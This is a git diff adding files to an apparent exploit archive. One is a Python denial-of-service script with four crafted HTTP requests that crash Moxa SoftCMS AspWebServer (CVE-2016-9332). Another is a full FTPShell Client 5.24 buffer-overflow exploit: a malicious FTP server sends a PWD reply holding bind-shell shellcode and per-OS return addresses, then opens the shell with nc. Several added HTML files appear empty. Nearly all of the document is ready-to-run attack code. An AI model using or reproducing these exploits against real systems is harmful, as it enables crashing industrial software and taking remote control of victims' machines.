000000000..fc112c9d1 --- /dev/null +++ b/platforms/windows/dos/40779.py @@ -0,0 +1,33 @@ +''' +# Title: Moxa SoftCMS 1.5 AspWebServer Denial of Service Vulnerability +# Author: Zhou Yu +# Email: 504137480@qq.com +# Vendor: http://www.moxa.com/ +# Versions affected: 1.5 or prior versions +# Test on: Moxa SoftCMS 1.5 on Windows 7 SP1 x32 +# CVE: CVE-2016-9332 +# Advisory: https://ics-cert.us-cert.gov/advisories/ICSA-16-322-02 + +Vulnerability Description: +AspWebServer does not properly validate input. An attacker could provide unexpected values and cause the program to crash or excessive consumption of resources could result in a denial-of-service condition. + + +Vulnerability Discovery Method: +With the help of kitty fuzzing framework, we are able to find some vulnerabilities of the AspWebServer when parsing HTTP GET request. Details of the fuzzer scripts and output can be found here: https://github.com/dazhouzhou/ICS-Vulnerabilities/tree/master/Moxa/SoftCMS . +''' + +import socket +host = '192.168.124.128' +port = 81 + +# extracted four payloads from crashes that can crash the AspWebServer.exe +payload1 = 'GET /\ HTTP/1.1\r\n\r\n' +payload2 = 'GET \x00 HTTP/1.1\r\n\r\n' +payload3 = 'GET \n HTTP/1.1\r\n\r\n' +payload4 = 'GET /. HTTP/1.1\r\n\r\n' + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect((host, port)) +s.send(payload1) +s.close() + diff --git a/platforms/windows/dos/40784.html b/platforms/windows/dos/40784.html new file mode 100755 index 000000000..7c118edc1 --- /dev/null +++ b/platforms/windows/dos/40784.html @@ -0,0 +1,48 @@ + + + + + + + \ No newline at end of file diff --git a/platforms/windows/dos/40785.html b/platforms/windows/dos/40785.html new file mode 100755 index 000000000..10018e1a5 --- /dev/null +++ b/platforms/windows/dos/40785.html @@ -0,0 +1,168 @@ + + + + + + + + diff --git a/platforms/windows/dos/40786.html b/platforms/windows/dos/40786.html new file mode 100755 index 000000000..87bf72498 --- /dev/null +++ b/platforms/windows/dos/40786.html @@ -0,0 +1,82 @@ + + + + + + + + + \ No newline at end of file diff --git a/platforms/windows/dos/40787.html b/platforms/windows/dos/40787.html new file mode 100755 index 000000000..735988025 --- /dev/null +++ b/platforms/windows/dos/40787.html @@ -0,0 +1,88 @@ + + + + + + + + + + + diff --git a/platforms/windows/remote/40778.py b/platforms/windows/remote/40778.py new file mode 100755 index 000000000..85ce72eb7 --- /dev/null +++ b/platforms/windows/remote/40778.py @@ -0,0 +1,113 @@ +# -*- coding: utf-8 -*- + +# Exploit Title: FTPShell Client v5.24 PWD Remote Buffer Overflow +# Date: 16/11/2016 +# Author: Yunus YILDIRIM (Th3GundY) +# Team: CT-Zer0 (@CRYPTTECH) - http://www.ct-zer0.com +# Author Website: http://yildirimyunus.com +# Contact: yunusyildirim@protonmail.com +# Software Link: http://www.ftpshell.com/downloadclient.htm +# Tested on: Windows XP Professional SP 2 +# Tested on: Windows 7 Ultimate 32bit, Home Premium 64bit + +import socket +import sys +import os +import time + + +def banner(): + banner = "\n\n" + banner += " ██████╗████████╗ ███████╗███████╗██████╗ ██████╗ \n" + banner += " ██╔════╝╚══██╔══╝ ╚══███╔╝██╔════╝██╔══██╗██╔═████╗ \n" + banner += " ██║ ██║█████╗ ███╔╝ █████╗ ██████╔╝██║██╔██║ \n" + banner += " ██║ ██║╚════╝███╔╝ ██╔══╝ ██╔══██╗████╔╝██║ \n" + banner += " ╚██████╗ ██║ ███████╗███████╗██║ ██║╚██████╔╝ \n" + banner += " ╚═════╝ ╚═╝ ╚══════╝╚══════╝╚═╝ ╚═╝ ╚═════╝ \n" + banner += " \n" + print banner + + +def usage(): + banner() + print "[-] Missing arguments\n" + print "[*] Usage: python FTPShell-exploit.py target_os" + print "[*] Target types:\n\tWindows XP -> winxp\n\tWindows 7-32bit -> win7_32\n\tWindows 7-64bit -> win7_64\n" + sys.exit(0) + + +def exploit(target_eip): + s0ck3t = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s0ck3t.bind(("0.0.0.0", 21)) + s0ck3t.listen(5) + print "[*] CT-Zer0 Evil FTP Server Listening port 21\n" + + # \x00\x0a\x0d\x22\xff + # msfvenom -p windows/shell_bind_tcp LPORT=5656 -f c -b '\x00\x0a\x0d\x22\xff' + shellcode = ("\xbb\x61\xad\x84\xdf\xda\xcc\xd9\x74\x24\xf4\x5a\x33\xc9\xb1" + "\x53\x31\x5a\x12\x83\xc2\x04\x03\x3b\xa3\x66\x2a\x47\x53\xe4" + "\xd5\xb7\xa4\x89\x5c\x52\x95\x89\x3b\x17\x86\x39\x4f\x75\x2b" + "\xb1\x1d\x6d\xb8\xb7\x89\x82\x09\x7d\xec\xad\x8a\x2e\xcc\xac" + "\x08\x2d\x01\x0e\x30\xfe\x54\x4f\x75\xe3\x95\x1d\x2e\x6f\x0b" + "\xb1\x5b\x25\x90\x3a\x17\xab\x90\xdf\xe0\xca\xb1\x4e\x7a\x95" + "\x11\x71\xaf\xad\x1b\x69\xac\x88\xd2\x02\x06\x66\xe5\xc2\x56" + "\x87\x4a\x2b\x57\x7a\x92\x6c\x50\x65\xe1\x84\xa2\x18\xf2\x53" + "\xd8\xc6\x77\x47\x7a\x8c\x20\xa3\x7a\x41\xb6\x20\x70\x2e\xbc" + "\x6e\x95\xb1\x11\x05\xa1\x3a\x94\xc9\x23\x78\xb3\xcd\x68\xda" + "\xda\x54\xd5\x8d\xe3\x86\xb6\x72\x46\xcd\x5b\x66\xfb\x8c\x33" + "\x4b\x36\x2e\xc4\xc3\x41\x5d\xf6\x4c\xfa\xc9\xba\x05\x24\x0e" + "\xbc\x3f\x90\x80\x43\xc0\xe1\x89\x87\x94\xb1\xa1\x2e\x95\x59" + "\x31\xce\x40\xf7\x39\x69\x3b\xea\xc4\xc9\xeb\xaa\x66\xa2\xe1" + "\x24\x59\xd2\x09\xef\xf2\x7b\xf4\x10\xea\x63\x71\xf6\x78\x84" + "\xd7\xa0\x14\x66\x0c\x79\x83\x99\x66\xd1\x23\xd1\x60\xe6\x4c" + "\xe2\xa6\x40\xda\x69\xa5\x54\xfb\x6d\xe0\xfc\x6c\xf9\x7e\x6d" + "\xdf\x9b\x7f\xa4\xb7\x38\xed\x23\x47\x36\x0e\xfc\x10\x1f\xe0" + "\xf5\xf4\x8d\x5b\xac\xea\x4f\x3d\x97\xae\x8b\xfe\x16\x2f\x59" + "\xba\x3c\x3f\xa7\x43\x79\x6b\x77\x12\xd7\xc5\x31\xcc\x99\xbf" + "\xeb\xa3\x73\x57\x6d\x88\x43\x21\x72\xc5\x35\xcd\xc3\xb0\x03" + "\xf2\xec\x54\x84\x8b\x10\xc5\x6b\x46\x91\xf5\x21\xca\xb0\x9d" + "\xef\x9f\x80\xc3\x0f\x4a\xc6\xfd\x93\x7e\xb7\xf9\x8c\x0b\xb2" + "\x46\x0b\xe0\xce\xd7\xfe\x06\x7c\xd7\x2a") + + buffer = "A" * 400 + target_eip + "\x90" * 40 + shellcode + + while True: + victim, addr = s0ck3t.accept() + victim.send("220 CT-Zer0 Evil FTP Service\r\n") + print "[*] Connection accepted from %s\n" % addr[0] + while True: + data = victim.recv(1024) + if "USER" in data: + victim.send("331 User name okay, need password\r\n\r\n") + print "\t[+] 331 USER = %s" % data.split(" ")[1], + elif "PASS" in data: + victim.send("230 Password accepted.\r\n230 User logged in.\r\n") + print "\t[+] 230 PASS = %s" % data.split(" ")[1], + elif "PWD" in data: + victim.send('257 "' + buffer + '" is current directory\r\n') + print "\t[+] 257 PWD" + print "\n[*] Exploit Sent Successfully\n" + time.sleep(2) + print '[+] You got bind shell on port 5656\n' + os.system('nc ' + str(addr[0]) + ' 5656') + + +if len(sys.argv) != 2: + usage() +else: + banner() + try: + if sys.argv[1] == "winxp": + # 7C80C75B JMP EBP kernel32.dll + target_eip = "\x5B\xC7\x80\x7C" + elif sys.argv[1] == "win7_32": + # 76ad0299 jmp ebp [kernel32.dll] + target_eip = "\x99\x02\xAD\x76" + elif sys.argv[1] == "win7_64": + # 7619dfce jmp ebp [kernel32.dll] + target_eip = "\xCE\xDF\x19\x76" + else: + usage() + exploit(target_eip) + except: + print "\n[O_o] KTHXBYE! [O_o]"